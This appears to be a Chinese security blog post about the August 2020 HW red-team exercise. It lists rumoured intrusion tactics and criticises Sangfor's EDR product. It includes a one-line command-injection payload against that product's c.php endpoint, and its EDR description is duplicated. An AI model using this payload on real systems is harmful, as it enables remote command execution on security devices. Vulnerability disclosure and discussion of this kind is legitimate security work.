昨天是2020年8月17日,对于做安全的人来说,特别是渗透红蓝对抗这种的,肯定印象极其深刻:
其中不乏有巨佬坐镇的,也有混子摸鱼混经验的,各种操作姿势也是层出不穷:
HW期间听闻的各种神操作:
无人机搞Wi-Fi的
挖下水道进内部的
BadUSB钓鱼的
提前半个月混入甲方的
望远镜看密码的
红队伪装蓝队进行木马钓鱼的
利用深信服0day伪装进入的
首页开局一张图片的
美人计的
只有你想不到的,该做的都做了。害。
昨天最令人震惊的就是深信服的EDR设备,作为终端检测响应平台,竟然存在漏洞,还如此之多。
什么是EDR:围绕终端资产安全生命周期,通过预防、防御、检测、响应赋予终端更为细致的隔离策略、更为精准的查杀能力、更为持续的检测能力、更为快速的处置能力。在应对高级威胁的同时,通过云网端联动协同、威胁情报共享、多层级响应机制,帮助用户快速处置终端安全问题,构建轻量级、智能化、响应快的下一代终端安全系统生命周期,通过预防、防御、检测、响应赋予终端更为细致的隔离策略、更为精准的查杀能力、更为持续的检测能力、更为快速的处置能力。在应对高级威胁的同时,通过云网端联动协同、威胁情报共享、多层级响应机制,帮助用户快速处置终端安全问题,构建轻量级、智能化、响应快的下一代终端安全系统。
漏洞复现:
payload:
https://xxx.xxx/tool/log/c.php?strip_slashes=system&host=pwd
可以说是比较失败的一个产品,作为一个盾,怎么能忍受盾的本身有边边角角的裂口?
源码没有看过,但是也听说了:写的很烂,可以说他们的开发完全没有任何安全开发的经验或者培训,代码的bug数量都快超过代码本身。。。。
这只是冰山一脚。可能在后面的hw行动中还会有爆出的东西。
以上内容仅供学习参考,切勿使用非法用途!